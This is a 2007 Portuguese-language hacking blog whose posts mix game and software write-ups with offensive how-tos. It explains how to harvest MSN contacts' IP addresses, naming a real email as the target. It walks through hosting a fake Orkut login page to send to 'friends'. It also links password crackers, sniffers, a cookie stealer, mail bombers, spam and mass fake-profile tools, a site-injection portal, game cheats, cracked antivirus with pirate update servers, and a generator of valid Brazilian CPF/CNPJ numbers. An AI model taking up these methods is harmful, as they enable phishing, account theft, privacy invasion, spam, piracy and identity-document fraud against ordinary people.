sexta-feira, 30 de novembro de 2007

modo + facil de pegar ip[Ip get]

modo + facil de pegar ip[Ip get]
Em muitos sites por ai existem metodos de pegar IP pelo MSN ultrapassados,alguns que nem funcionam.Agora você vai aprender a pegar IP pelo MSN sem enviar nenhum arquivo.Esse tutorial é exclusivo do site Hacker VL totalmente feito por mim Alex.Faça o donwload e instale os seguintes programas e o script para o Messenger Discovery Live,instale na ordem a seguir.Se você ja tem instalado naum precisa instalar novamente.download.microsoft.com/download/a/c/c/accc1d70-d00b-4ad0-a78a-c8c695458359/EN-US/Install_WLMessenger.exe(link xD)download.msgpluslive.net/setup/MsgPlusLive-423.exe (link xD)http://www.divshare.com/download/1731546-363Todos os programas acima estão nas suas versões atuais.Depois de tudo instalado corretamente abra a janela principal do MSN e clique no icone dos scripts de Messenger Plus como mostra a imagem a seguir:Clique em IP Get e clique em Settings, onde esta escrito Interface selecione seu adaptador de rede.Clique em save e pronto ira começa a capturar os endereços IPs de seus amigos que conversarem com você,quase sempre apenas você teclando com seu amigo o programa ja lhe mostrara o IP mas se isso naum aconteceer mande uma foto para seu amigo que ai com certeza aparece o IP,mas dificelmente é preciso isso.Todos os IPS ficam armazenados em um log juntamente com o e-mail dos IPs capturados e a hora que foi capturado.A video aula a seguir mostra como funciona o IP Get e onde fica localizado o arquivo de log.Na video aula irei pegar o IP desse e-mail:marcelo2628@hotmail.comComo vocês irão ver varios outros IPs apareceram mesmo eu naum ter feito nada.http://www.youtube.com/v/t_8BASPhbuY

terça-feira, 20 de novembro de 2007

TUT - Aprenda a hospedar no 110mb.com

TUT - Aprenda a hospedar no 110mb.com
já q muita gente ta pedindo como hospedar vou postar um tuto1-entre nesse site:www.110mb.com2-clique em "sing-up" (lá em cima em azul)3-prencha com seus dados4-entre no e-mail q vc colocou quando tava criando a conta, lá vai ter um link, copie e cole ele no navegador e a sua conta será ativada5-entre de novo no: www.110mb.com e lá em cima clique em "Creat Site"6-coloque seu loggin e sua senha, abrirá uma pagina7-em file manager(onde tem um "armariozinho") no quadrado do file manager vc vai clicar em acess8-vai ter uma "tabelinha" onde tá index, no canto direito da tabela vc clica em edit (q é um icone de um lápis e um caderno)9-espere a pagina carregar e aparecer tipo um troço do word, (demora um poiquinho)10- lá em cima do troço q parece o word vc vai clicar em "código fonte" e vai por o código fonte da página do orkut fake configurada com o seu -email11- clike no disqueti lá em cima para salvar o código fonte12- clike agora em cima de "index" e pegue o link e passe para seus "amiguinhos"
"testado e aprovado po mim alemaoks tutoria legal vlw "

sexta-feira, 16 de novembro de 2007

Damage hacker de gb

Damage hack
funfandO e facil de usadowload : http://rapidshare.com/files/70031277/ProtectX.zip.html

Gold+Avatar hacker+MoonLight+Delay hacker de gb


Gold+Avatar hacker+MoonLight+Delay hacker
bom gent vim avisar que os hacker q postei anteriormente muitas pessoa conssiguio usa mas como o dono deu closed n vai ter ma comomas vim trazer novidades para vcs novo MoonLightFunfando 100% seguro sem virus prejudicativosTestado e aprovado Pela Equipe De Hacker alemaoks.

hacker gb

Aim boyd
não tinha outro nome coloquei esse

é facil de usar clique na pessoa que vc quer acerta não tem linha mas na barra old ficara uma marca com a fora que deve usar remova o fundo da tela tb para que possa ver o angulo que o aim mostra vlw podem scanear e posta os resultados ai

por favor não espalhem em algum forum pq se não vai para de funcionar rapido demais guarde esse para as pessoa desse blog ok.http://www.sendspace.com/file/88djr8

quinta-feira, 15 de novembro de 2007

MSN Protocol Analizer


DOWNLOADS DE MELHORES PROGRAMAS HACKER



Nome do Programa
Descrição
Tamanho
Atrojans
Monitora suas portas e avisa ataques de trojans.
350 KB
Bat2exec
Transforma arquivos bat em executáveis, ".COM"
6 KB
Brutus aet2
Programa que descobre password através de um wordlist.
421 KB
http://geocities.yahoo.com.br/destruicaohacker/wwwhack.zip
O mesmo que o Brutus aet2

Divint3
Várias ferramentas hacker...flood..
32 KB
FlashScan
Simples portscan com várias informações.
166 KB
Revelation
Revela senhas criptografadas do windows (***).
10 KB
NetScream 1.2.27.2006a
Melhora a performance de seu MODEM dial-up.
774 KB
SwitchSniffer 1.1.0
Excelente sniffer de rede que pode ser usado junto com o MSN Protocol Analyzer vale a pena testar.
3030 KB
ID Server
Scaneia portas abertas de determinado ip
11 Kb
WordList
O próprio nome já diz, cria wordlist.
17 KB
32bit Email Broadcaster 9.86.01
Envie centenas de e-mails ao mesmo tempo, economizando tempo e trabalho. Busca: bombmail, spam
500 KB
Accessdiver/Ares
Busca: log Programa que analisa logs.
212 KB
Advanced PDF Password Recovery
Outro programa para quebrar senhas de arquivos pdf
1 KB
Advanced Zip Password Recovery 3.54
Programa para recuperar(quebrar) senhas perdidas ou esquecidas para arquivos zip/pkzip/winz
1058 KB
AI RoboForm 6.6.5
Gerenciador de senhas e preenchedor de formulários em páginas da Internet,com uso fácil e seguro.
2000 KB
Azpr
Programa para quebrar senhas de aquivos Zip
1 KB
Bitsoft ShowIP 1.6
Verificador de endereço IP. Busca: ip
380 KB
BPR
Programa para remover senha da BIOS da máquina. Necessita que o computador já esteja com o sistema operacional
124 KB

orkut Downloads Programas


orkut

Downloads

Programas



· All About Orkut 1.0 - (Flooda vídeos e depoimentos)

· Chameleon – (Criptografa e descriptografa HEX e Base64)

· Cyber Eraser – (Apaga recadoss)

· Cyber Flood Depoimentos – (Flooda depoimentos)

· Cyber Flood Scraps – (Flooda Scraps)

· Cyber Make Fake – (Cria profiles em massa)

· Cookie Monster – (Captura cookies,vai com tutorial junto,by Xis Nove)

· Envie Alegria – (Envia scraps para todos seus amigos)

· Find Uid – (Captura Uids)

· Floodmachine – (Melhor programa para floodar scraps)

· Formatador Orkut – (Formata seus scraps)

· Free Orkut Toolbar – (Barra de ferramentas multi-função)

· Google Talk – (Mensageiro instantâneo do Orkut)

· Jim Orkut Tools 1.5 – (removido)

· Loginkut – (Loga automaticamente em seu perfil com tempo determinando para se manter sempre no topo)

· Lost Soul Flooder – (Flooda scraps)

· Make Fake 1.0 – (Cria profiles em massa)

· Make Fake 1.5 – (Cria profiles em massa)

· Mass add – (Add pessoas de determinadas comunidades em massa)

· Mass Flood Depoimentos – (Flooda depoimentos)

· Mass Flood Scraps 1.0 – (Flooda scraps)

· Mass Flood Scraps 1.5 – (Flooda scraps

· Meetul Profile Maker – (Cria profiles em massa)

· No Spam – (Bloqueia scraps spam no Orkut)

· Orkut detetetive – (Gerenciador de profiles)

· Orkut Clear Testimonial – (Apaga depoimentos)

· Orkut Community Manager – (Gerenciador de comunidades)

· Orkut Flooding – (Flooda scraps,depoimentos e vídeos)

· Orkut Plus – (Gerenciador de profiles)

· Orkut Spam Tools – (Flooda comunidades)

· Orkut Mailer – (Envia Scraps ou depoimentos para todos seus amigos)

· Orkut Cute – (Envia scraps para todos seus amigos)

· Pending Members – (Aceita os membros pendentes em suas comunidades)

· Popeye’s Super Flooder Beta 2.0 – (Flooda scraps e depoimentos)

· Popeye’s Super Flooder Beta 3.0 – (Flooda scraps e depoimentos)

· Profile Counter – (Gerenciador de profiles)

· Sar Profile Maker – (Cria profiles em massa)

· Scrapboy – (Transforme o Orkut em um mensageiro instantâneo)

· Sony Clean Testimonial – (Apaga depoimentos)

· Sony Friends Orkut 1.5 – (Envia scraps e depoimentos para todos seus amigos)

· Sony Friends Orkut 1.6 – (Envia scraps e depoimentos para todos seus amigos)

· Sony Flood Scrap – (Flooda scraps)

· Scraps Profile Community – (Envia scraps para todos de uma cmm)

· Scrap Sender – (Envia scraps para todos seus amigos)

· Toc toc – (Envia scraps para todos seus amigos)

· Torkutter – (Gerenciador de Profiles)

· Upador de Profiles – (Upa seus profiles)



Extensões para Firefox



· Orkut Toolbar – (Barra de ferramentas multi-função)

· Greasemonkey – (Permite aplicar scripts em páginas automaticamente)

· Orkut Helper – (Permite logar sem digitar a senha,envia scraps para todos de uma cmm,etc)

· Stylish – (Permite aplicar CSS em páginas automaticamente)

· NoScript – (Bloqueia javascripts maliciosos,XSS,etc)

· Adblock – (Elimina propagandas,inclusive as do Orkut,sendo configurado para isso)


TUDO AQUI:http://mentesworld.vilabol.uol.com.br/prog_orkut.htm

quarta-feira, 14 de novembro de 2007

F.E.A.R. Combat 1.07



Tamanho: 1,76 GBLicença: Entenda o que é cada licença de uso Gratuito Data: 17 de Agosto de 2006Desenvolvedor: Sierra Veja mais programas desta empresa Sistema: Windows 2000/XPLimitações: não possui Categoria: Tiro em Primeira Pessoa (FPS) Veja programas semelhantes a esteRequerimentos: CPU 1.4 GHz, 512MB de memória RAM, Placa de Vídeo 3D compatível com Direct3D com 64MB de memória e DirectX 9.0c ou superior instalado.Tempo de Download estimado: 69:50:29 a 56 Kbpsalterar
F.E.A.R. Combat é a versão multiplayer gratuita do aclamado vencedor de prêmios F.E.A.R., sendo considerado o melhor jogo de 2005 pelos especialistas da área e conquistando milhões de fãs, promete ser um grande sucesso. Em um ato visionário e de bom senso, a Sierra resolveu colocar o jogo na história, assim como a Valve fez com Half Life e Counter Strike, e a ID Software com Wolfenstein: Enemy Territory.
Mas o fato do jogo ser de graça não quer dizer que ele possui limitações ou tem sua qualidade reduzida, pelo contrário, F.E.A.R. Combat possui todas as funcionalidades multiplayer da versão paga, assim como as atualizações, mapas oficiais, modos de jogo, armas e a opção de fazer download de conteúdo feito pela comunidade. Outro ponto importante é que tanto os usuários da versão grátis, como os da versão paga podem jogar juntos.
Para poder jogar, cadastre-se no site do F.E.A.R. para conseguir uma chave de ativação, e depois instale o jogo normalmente inserindo o código adquirido com o fabricante para autenticar sua cópia e permitir que você jogue nos servidores oficiais.
Por ser um jogo de tiro em primeira pessoa para ser jogado com outras pessoas, ele possui uma ampla gama de opções de entretenimento e possibilidades para criar estratégias. Jogue com amigos em um servidor privado ou com pessoas do mundo inteiro em diversos modos de jogo que dão diversas opções de jogo, podendo jogar em times ou individualmente contra os outros.
Tudo isso em mapas incríveis, com armas baseadas em experimentos do exército norte-americano, gráficos 3D de última geração, assim como efeitos físicos e de luz somados a uma trilha sonora incrível, trazendo um realismo inédito e uma ótima oportunidade para diversão quase infinita.
O que significa?
FEAR em inglês significa medo, mas como uma sigla, quer dizer "First Encounter Assault Recon", ou Esquadrão de Reconhecimento e Contatos Imediatos, ou seja, o jogo tem como intenção ter uma atmosfera cheia de medo, ação e adrenalina, contando com elementos de filmes de terror e de ação futurista.
Principais características do game:
Jogue com até 16 jogadores no mesmo mapa.São 10 modos de jogo multiplayer.Conta com 19 mapas multiplayer.Enfrente inimigos com 12 armas diferentes.Suporta o Punkbuster, um programa que evita trapaças (cheats).Possibilita fazer download de conteúdos criados pela comunidade.Possibilita jogar com usuários da versão paga.
Modos de jogo
Deathmatch:
Esse modo de jogo é o mais simples, assim como o mais divertido. Ele consiste em quem matar mais vence, simples assim.
Team Deathmatch:
A mesma coisa que o Deathmatch normal, só que os jogadores estão divididos em time. A equipe que matar mais vence.
Slowmo Deathmatch:
A mesma coisa que o Deathmatch normal, só que os jogadores podem pegar um powerup que permite diminuir a velocidade do jogo para os adversários, só que quem tem o poder continua a se mover e atirar normalmente, podendo matar os inimigos facilmente. Mas cuidado, o jogador que estiver com esse poder se torna o alvo preferido dos outros, pois ao morrer, os powerups caem e qualquer um pode pegá-lo.
Slowmo Team Deathmatch:
A mesma coisa que o Team Deathmatch, só que com o diferencial do Slowmo Deathmatch. Quando um jogador ativa a desaceleração do tempo, ele afeta todo o time (a equipe adversária fica lenta e a sua continua a se mover e a atirar normalmente).
Elimination:
É um modo onde quem morre não volta para o jogo, assim, quem ganha é aquele que fica vivo por último. Ao sobrar só um jogador vivo, a partida reinicia e todos voltam a se matar para tentar ser o único sobrevivente.
Team Elimination:
O mesmo que o Elimination, onde o time que eliminar o outro primeiro vence. Muito parecido com o Counter Strike.
Capture the Flag:
Neste modo você deve, junto do seu time, capturar a bandeira do time adversário e trazê-la até a bandeira do seu time. A equipe que conseguir capturar a bandeira dos inimigos mais vezes vence.
Slowmo Capture the Flag:
Assim como no Slowmo Team Deathmatch, você pode desacelerar o tempo para obter vantagem sobre a equipe adversária, só que neste modo você captura a bandeira inimiga como no Capture the Flag normal.
Conquer All:
Neste modo você e o seu time devem capturar três "pontos de controle", que ao serem dominados e mantidos somam pontos para a equipe. A equipe que somar mais pontos, ou tiver a maior pontuação ao final do tempo limite será a vencedora.
Control:
É um modo onde você e seu time lutam por cinco "pontos de controle", que ao serem dominados somam pontos para a equipe. A equipe pontua ao matar inimigos, neutralizar os "pontos de controle" do outro time ou manter dominados seus pontos de controle. A equipe que fizer a maior pontuação vence.
Armas
Artes marciais: acerta o inimigo utilizando socos e chutes, possibilitando uma ampla gama de golpesrápidos e mortais, pois quando o personagem está sem armas na mão, ele anda e se move muito mais rápido.Coronhada: bate com a coronha da arma, matando o alvo com praticamente um golpe.Pistola Rakow HP-14, calibre .40: arma leve para qualquer ocasião, tem um tiro razoavelmente rápido e pode ser usada duas ao mesmo tempo, uma em cada mão.Escopeta Vollmer VK-12, calibre 12: arma pesada para curtas distâncias, ideal para matar grupo de inimigos ou pulverizar um alvo a curta distância.Sub-Metralhadora Sumak RPL, calibre 9mm: arma leve de tiro rápido, extremamente eficaz para eliminar rapidamente alvos fracos.Rifle de assalto Rakow G2A2, calibre 5.56mm: arma pesada de tiro rápido, elimina rapidamente o alvo.Rifle pesado Baksha, calibre 7.62mm: arma pesada de alta precisão, capaz de matar o alvo com apenas umtiro.Rifle pesado Armacham "Penetrator", calibre 10mm: arma pesada de alto poder de impacto, que podefacilmente desmembrar o alvo.Canhão Obregon MP-50, calibre 20mm: arma pesada de alto poder de impacto, pode facilmente desintegrar oalvo.Rifle de partículas supersônicas Armacham Type-7: arma pesada que atira projéteis supersônicos (acima davelocidade do som) capazes de dizimar filas de inimigos com um só tiro, restando apenas pedaços do queantes eram seres vivos.Lança foguetes Andra MOD-3 MP: arma pesada que atira foguetes que literalmente explodem os inimigoseliminando tudo o que se encontra no seu raio de destruição.Granada de fragmentação: boa para se livrar de inimigos escondidos em áreas difíceis de se alcançar.Bomba ativada por controle remoto: ideal para criar armadilhas para inimigos desprevinidos.Mina terrestre ativada por proximidade: ideal para criar armadilhas para inimigos desprevinidos.
História
Uma força paramilitar não-identificada tenta se infiltrar numa infra-estrutura espacial com soldados modificados geneticamente. O time de forças especiais enviado pelo governo não consegue conter a situação e o contato entre eles é interrompido por um sinal nas comunicações via rádio. Quando a interferência cessa alguns momentos depois, o time se perde. Um massacre sangrento é deferido numa onda de destruição que mata todos antes que possam reagir.
O grupo especial F.E.A.R. é acionado, sendo o último recurso nessa situação desesperadora. Como parte de uma elite, a equipe foi criado para as situações mais chocantes e complicadas. Sua missão é simples: elimine os intrusos a qualquer custo, determine a origem do sinal e contenha a crise antes que tudo fique fora de controle.

1. Para poder jogar, cadastre-se no site do F.E.A.R. para conseguir uma chave de ativação, e depois instale o jogo normalmente inserindo o código adquirido com o fabricante para autenticar sua cópia e permitir que você jogue nos servidores oficiais.
2. Por se tratar de um download com um tamanho muito grande, é aconselhável a utilização de um Gerenciador de Download para que você possa baixá-lo no intervalo de tempo que quiser, pausando e continuando o progresso da transferência.

Counter-Strike 1.6


Você já se imaginou no meio de um combate contra terroristas? Então, em Counter-Strike - o game mais jogado no mundo todo - esse combate é real! Muita adrenalina, ação, tiros para todos os lados, granadas e tensão fizeram deste game um clássico que conquistou o universo dos jogos online em primeira pessoa.
Counter Strike é uma modificação (MOD) do Half-Life que conseguiu atingir um nível de sucesso maior do que o próprio Half-Life. CS foi lançado um ano após o Half-Life por uma equipe a parte que o batizou com o nome de Counter-Strike (em 1999). Em pouco tempo o game conquistou uma legião de jogadores e criou um fenômeno mundial. Aqui no Brasil não foi diferente, o game foi capaz de engendrar a chamada "febre das lan houses", que perdurou até pouco tempo.
Hoje, sete anos depois, há uma variedade imensa de jogos mais modernos, porém CS ainda é o preferido entre os gamers! Qual a fórmula mágica que está garantindo o apogeu deste jogo por anos? Confira a seguir!
Jogabilidade
A jogabilidade é o fator principal do sucesso do Counter-Strike, pois seu estilo é muito próximo da realidade, transformando a tensão da partida em pura adrenalina, convergindo tudo isso para um estado psicológico comparado ao dos esportes radicais.
Por exemplo, imagine-se sozinho contra dez inimigos armados até os dentes, você sentirá o sangue esquentando, os dentes rangendo e não piscará em um só momento, esperando apenas um estopim para ficar irado e sair metendo bala em todo mundo.
O fator realidade é essencial, mas outra vantagem que pesa, e muito, é a física. Half-Life sempre inovou o mundo dos jogos - tanto no HL 1 e HL 2 - ao criar físicas capazes de abrir portas no universo do entretenimento.
Muitos games tentam conseguir alcançar o sucesso do Counter-Strike, mas poucos chegam perto.
Principais características do Counter-Strike:
Gráficos e sons bem trabalhados.Armas e equipamentos que correspondem às reais.Oportunidades de criar estratégias para realizar boas jogadas.Trabalho em equipe.Realização de objetivos para cada estilo de jogo.Uma variedade de mapas que imitam diversos lugares do mundo atual e outros fictícios.Movimentos e reações que equivalem à realidade.Muito sangue, explosões e morte para todos os lados.Estilo de jogo dinâmico e fácil de jogar, permitindo respostas consistentes e precisas nos movimentos e ações executadas.
Modos de Jogo
Counter-Strike possui quatro modos de jogos: proteger o VIP (pessoa muito importante), salvar reféns, desarmar a bomba e chacina geral. Todos os modos funcionam por rodadas.
Desarmando a bomba: O estilo mais clássico do jogo, é utilizado por campeonatos e jogadores profissionais ou amadores por ser o mais desafiador e divertido. A missão dos terroristas é conquistar localizações específicas para plantar a bomba e protegê-la até que a mesma exploda ou matar todos os membros da equipe contra-terrorista - tudo isso num intervalo de tempo escasso.
Já o objetivo dos contra-terroristas é defender esses locais a todo custo, matando toda a equipe terrorista ou desarmando a bomba, caso a mesma seja plantada. Esse estilo de jogo é muito equilibrado e, portanto, o mais jogado.
Mapas com o prefixo de_ representam esse modo de jogo.
Salvando reféns: Neste modo o objetivo dos CTs é invadir a área dominada pelos terroristas e chegar aos reféns. Uma vez com eles, os contra-terroristas devem levá-los a salvo para sua base. Pelo lado terrorista, o objetivo é vigiar os reféns e matar todos os CTs que tentarem resgatá-los.
Mapas com o prefixo cs_ representam esse modo de jogo.
Protegendo o VIP: VIP, do inglês, Very Important Person, significa pessoa muito importante. Neste modo a equipe contra-terrorista deverá ajudar o VIP (controlado por um jogador) a chegar em um ponto de resgate. Do outro lado, os terroristas devem armar comboios para matar o VIP.
Mapas com o prefixo as_ representam esse modo de jogo.
Chacina Total: Existem servidores onde as regras não correspondem aos modos comuns de jogo, pois existe apenas um único objetivo: matar todos da outra equipe. Neste modo você tem que eliminar os oponentes do time adversário antes que eles eliminem os membros do seu.
Armas
Counter-Strike se destaca por ser um jogo onde as armas, munições e os equipamentos são retirados do armamento atual, portanto de fato existem, o que torna tudo ainda mais emocionante.
No começo de cada rodada todo jogador terá um certo tanto de dinheiro - que varia de acordo com as rodadas anteriores, dependendo de quantas pessoas ele matou, se o time ganhou, etc - e terá de comprar seus equipamentos através desse valor. A seguir, conheça melhor as armas e os itens do game:
Faca: A faca é considerada uma arma terciária, no entanto com apenas 2 golpes você pode tirar a vida de um inimigo. O único problema disso é que para acertá-lo é necessário estar colado no adversário, o que torna a tarefa muito difícil. Também é útil para correr com mais velocidade.
Pistolas: As pistolas, apesar de serem comumente as arma secundárias de um jogador, são essencialmente importantes e podem salvá-lo de inúmeras situações. Um gamer que possua boas habilidades é capaz de matar inimigos bem armados com apenas um tiro de pistola na cabeça. Conheça as pistolas:
Glock: Exclusiva e a principal dos terroristas, possui dois modos de rajada: single (único) e burst fire (três tiros por rajada). Caracteriza-se por ser uma arma com um dano baixo, porém com muitas balas no pente (vinte).
USP: Exclusiva e a principal dos contra-terroristas, a USP é uma ótima pistola, possuindo danos altos e doze balas no pente. Também é possível incluir um silenciador nela.
Desert Eagle: A pistola mais fulminante e devastadora do game, é amada e idolatrada pela grande maioria dos jogadores. Conta com 7 balas no seu pente e até os mais bem armados tremem ao ver um bom jogador com apenas uma Eagle.
Five-Seven: Outra pistola exclusiva dos contra-terroristas, porém pouco utilizada pelos gamers. É leve e tem muitas balas no pente, mas com pouco impacto de dano.
Dual-Beretta: Restrito aos terroristas, são duas pistolas - uma para cada mão - com baixo poder de fogo. Pouco usadas pelos jogadores.
Escopetas:
As escopetas, conhecidas como shotguns, possuem alto poder de fogo para curtas distâncias, entretanto são ineficazes para distâncias maiores. CS possui 2 tipos de shotguns:
Leone 12 Gauge Super: Conhecida como a famosa "doze", pode reduzir qualquer inimigo a pedaços, pois um tiro certeiro a pouca distância é fatal. Seu recarregamento é manual, caracterizando-a como uma arma lenta.
Leone YG1265 Auto Shotgun: Com um carregamento automático, é muito mais rápida que a "doze", no entanto seu dano é menor.
Submetralhadoras:
As submetralhadoras são boas companheiras, possuem bastante balas e são ótimas a médias distâncias. Confira elas:
TMP: Uma submetralhadora exclusiva dos CTs, fácil de manusear mas com baixo poder de fogo.
Mac-10: Assim como a TMP, tem baixo poder de fogo, mas no entanto é fácil de usar. Exclusiva dos terroristas.
MP5: A melhor submetralhadora: danos médios e uma ótima agilidade. Muito estável, pode ser utilizada desde pequenas a média distâncias.
UMP: Lenta e fraca, a UMP é uma das armas menos vista em ação durante as partidas.
P90: Submetralhadora com muitas balas e um dano intermediário, porém apenas para curtas distâncias.
Metralhadora: A única metralhadora do game é a M249, conhecida no Brasil como "rambo", pois geralmente os jogadores que a possuem saem atirando "a torto e a direito" sem parar, tentando fuzilar todo mundo que aparecer na frente. Tem o maior pente (100 balas) e é capaz de armazenar 200 no total. Seu poder de fogo é alto, mas é uma arma difícil de se controlar.
Rifles: As melhores e mais potentes armas do jogo, sendo usadas eficientemente em todas distâncias. Fatais em quaisquer circunstâncias, os rifles são as armas mais vistas durante as partidas.
Famas: Um rifle exclusivo dos CTs, possui bons danos, mas poucas balas. É necessário pouco dinheiro para comprá-la, tornando-a uma arma muito viável para determinada circunstâncias. Assim como a glock, a Famas é capaz de dar três tiros por rajada no modo burst fire.
Galil: Restrito aos terroristas - assim como a Famas - também é uma arma mais barata do que os outros rifles e possui um ótimo dano. Possui um recoil mais estável que a AK-47 e é ótima para quaisquer distâncias.
Scout: Um rifle de assalto leve e ágil, conta com zoom e é ótima para grandes distâncias. Você pode matar um inimigo com 2 tiros ou apenas 1 se acertá-lo na cabeça.
AWP (AWM): A arma mais mortal do jogo, assim como a Scout, é um rifle de assalto, mas com poder mais fulminante. Geralmente elimina um inimigo com um tiro, com exceção em casos em que o adversário tem a vida completa e recebe um tiro na perna ou pé.
AK-47: O rifle preferido dos terroristas, ótimo para todo tipo de situação, é versátil e muito poderoso. Sua precisão é digna das armas com maior acuracidade do mundo. Extremamente eficaz.
M4A1: Restritamente para contra-terroristas, o M4A1 é o rifle mais estável e um dos mais preferidos dos jogadores. Pode incluir-se um silenciador e seu poder de fogo é muito alto. Ótimo para quaisquer tipos de distâncias.
Krieg 552: Exclusivo dos terroristas, é um rifle com capacidade de zoom (apenas 2x). Seu dano é médio e seu preço possui um baixo custo/benefício.
Krieg 550 Commando: Assim como a Krieg 552, esta arma é um rifle com zoom de até 2 vezes, mas para os contra-terroristas. A diferença é que seu dano e sua precisão são melhores, mas também o custo/benefício da arma é baixo.
Equipamentos
Os equipamentos são indispensáveis para a sobrevivência e elaboração de estratégias. Através deles você pode tirar vantagens sobre os inimigos em inúmeras situações.
Granadas: As granadas são essenciais e fornecem diferentes funções, tais como: táticas ou fatais.
HE: É a granada condicionada a causar danos. Mortal em diversas situações, a HE explode e causa danos fatais no seu raio de destruição.
Flashbang: Uma granada de função tática: ao estourar emite um raio luminoso capaz de cegar momentaneamente os inimigos. Extremamente útil em várias situações.
Smoke: Granada que solta fumaça e deixa o ambiente com pouca visibilidade. Assim como a flashbang, é uma granada fundamentalmente tática.
Itens:
Kevlar: Colete a prova de balas que diminui o dano sofrido por balas e explosões.
Kevlar + Helmet: Colete a prova de balas somado a um capacete. O capacete é essencial para diminuir o dano de tiros mortais (na cabeça).
Defuse Kit: Restrito ao time contra-terrorista, este kit permite defusar as bombas plantadas pelos terroristas.
Night Vision: Óculos de visão noturna. Apesar de parecer muito útil, é pouco utilizado pelos jogadores pelo fato de ser muito caro e não existirem muitos ambientes escuros no jogo.
Escudo Tático: O escudo é uma proteção exclusiva dos contra-terroristas. Com ele é possível apenas empunhar a faca ou uma pistola. A idéia é legal, mas muitos consideram o sistema muito desleal e ainda não aprimorado pelo fato de dar uma vantagem irreal a quem o utiliza.
Sobre o STEAM
A Valve - desenvolvedora do Half-Life - criou uma ferramenta chamada STEAM com o objetivo de unificar todos os games em um só sistema. Em outras palavras, para jogar qualquer jogo produzido por ela, você precisará do programa STEAM instalado.
Através dele será possível conectar-se em uma conta — que pode ser criada gratuitamente — para inserir as chaves de registros dos jogos comprados. Dessa forma as chaves (CD-Keys) ficam juntas em um só lugar e tudo o que você precisa para jogar os games, em qualquer PC do mundo, é estar logado (conectado) numa conta do STEAM.
Por ele você também pode comprar os jogos - para nós brasileiros, através de cartões de crédito internacionais - e baixá-los se possuir acoplado uma CD-KEY na conta. Portanto, ao comprar um jogo e colocar sua CD-KEY na conta do STEAM, automaticamente ela passa a ter um valor pecuniário (ou seja, vale dinheiro!). Por isso nunca passe a senha para um amigo ou até mesmo familiares.

VMware Workstation 6.0


Você quer ter vários sistemas operacionais em um ?VMware Workstation é, sem dúvida, um potente utilitário que permite o incrível: ter vários sistemas operacionais instalados sem necessidade de partições, além de fazer com que a mudança de um para outro seja bastante simples, quase tanto como carregar um programa.
Você poderá utilizar vários sistemas operacionais, combinando, por exemplo, o Windows XP com Linux sem nenhum problema. Outra das suas vantagens é que uma vez instalados os sistemas operacionais adicionais através do VMware, você poderá utilizá-los de forma individual e transferi-los para outros PC tranqüilamente.
O programa anfitrião só pode ser executado no Windows NT, 2000 ou XP (também existe versão para Linux), mas uma vez feito, as possibilidades de instalar novos sistemas operacionais disparam.
É um pouco assustador poder abrir um sistema operacional dentro do próprio e executá-lo em outra janela, sem necessidade de reiniciar, como se fosse um programa a mais, como se seu sistema operacional anterior tivesse desaparecido.
Outra das vantagens é que as instalações dos sistemas operacionais "adicionais" são independentes, de forma que podem ser transferidos para outro computador que também possua VMware e aí você terá esse sistema operacional completo e pronto para funcionar.
• Requisitos mínimos:· Processador: 400 MHz· Memória RAM: 128 MB
• Requisitos recomendados:· Processador: 500 MHz· Memória RAM: 256 MB

segunda-feira, 12 de novembro de 2007

Deixe seu firefox mto rapido


Deixe seu firefox mto rapidoDeixe seu FIREFOX como uma bala...Turbine Seu FirefoxTodo mundo que usa o FireFox adora ele por dois motivos: velocidade e facilidade.Mais se vc achava que não tinha como deixar ele mais rápido ainda, se enganaDe uma turbinada no seu FireFox com o tutorial abaixo:1. Digite "about:config" na barra de endereços e dê enter. Use page down até encontrar as seguintes entradas:network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequestsNormalmente o navegador faz uma requisição para uma página da web a cada vez. Quando você habilita pipelining ele fará várias requisições ao mesmo tempo, o que realmente aumenta a velocidade de carregamento das páginas.2. Altere as entradas como mostrado a seguir: (dê clique duplo na mesma para alterar o valor)Coloque "network.http.pipelining" como "true"Coloque "network.http.proxy.pipelining" como "true"Coloque "network.http.pipelining.maxrequests" para algum n° igual a 30.Isso fará com que o navegador efetue 30 requisições ao mesmo tempo. (A minha tá em 999 e ta otimo)3. Você vai ver uma barra no topo, e do lado um botão escrito "Localizar", nessa barra escreva qualquer coisa, vai você vai ver que a tela ficou branca.4. Finalmente de clique na parte branca com o direito do mouse e selecione Nova opção-> Inteira.... (New-> Integer...), coloque o nome "nglayout.initialpaint.delay" (sem aspas) e na outra tela digite o valor "0". Este valor é a quantidade de tempo que o navegador aguarda antes de agir com a informação que ele recebe. downloads:http://www.mozilla.com/en-US/products/download.html?product=firefox-2.0.0.9&os=win&lang=pt-BR

sábado, 10 de novembro de 2007

exploiter-invasão de sites

exploiter-invasão de sites
Pessoal da uma olhada aki:www.tutorial.webexploiter.comPort scanFiltro googleFTP anonimoTraceroutePHP injectionSQL injectionPingtudo on line.. Não precisa baixar nada.ainda tem um tutorial prático com um monte de sites vulneraveis.www.webexploiter.com

PROGRAMA PARA DESCOBRIR SENHAS


PROGRAMA PARA DESCOBRIR SENHAS
É SÓ ACESSAR O LINK ABAIXO:SENHAS DE DOCUMENTOS DO WORD, EXCELL, ETC..http://www.badongo.net/file/5070474

Download Nod32 e Kaspersky


Download Nod32 e Kaspersky
Download NOD32 e KASPERSKYDownload NOD32 Nova Versão 2.51.26 (Comercial)Essa eh a versão comercial, então pessoal ela não precisa de crack, pois eh como se fosse uma versão "comprada" porém necessita de seriais para atualizarem, por isso logo abaixo colocarei alguns servidores paralelos que estão funcionando:Link: http://rapidshare.de/files/17628116/NOD32_2.51.26.rar.htmlServidores:http://ruwarez.net/ndp/http://82.165.250.33/nod_eval/http://82.165.237.14/nod_eval/Se caso preferirem instalem o Fix 2.1, mesmo que essa versão não precise, mais o fix tb serve para crackear os servidores e atualizar o Nod32. Ok?Fix 2.1: NOD32.FiX.v2.1-nsane.rar.html" target="_blank">http://rapidshare.de/files/17750171/NOD32.FiX.v2.1-nsane.rar.htmlLembrando que esse NOD eh para WIN XPPara WIN 98/MEhttp://rapidshare.de/files/17677557/NOD32_25126_98.rar.htmlKASPERSKY 2006 COMPLETO PRA DOWNLOADKASPERSKY 2006 com chave de registro,e mais 3 programas que vem junto o cleanner ddl,,que remove arquivos desnecessários,,um firewall do kav e mais o Kaspersky ínternet security...Se existe anti vírus melhor que esses eu nao sei....http://rapidshare.de/files/16928154/kav6.en.msi.html

[ Internet ] Gerador de CPF e CNPJ válidos




[ Internet ] Gerador de CPF e CNPJ válidos
Pode confiar testado e aprovado por mim alemaoks =link:http://geradorcpfcnpj.ureshino.com.br/

Hackers quebram completamente proteção do Windows Vista


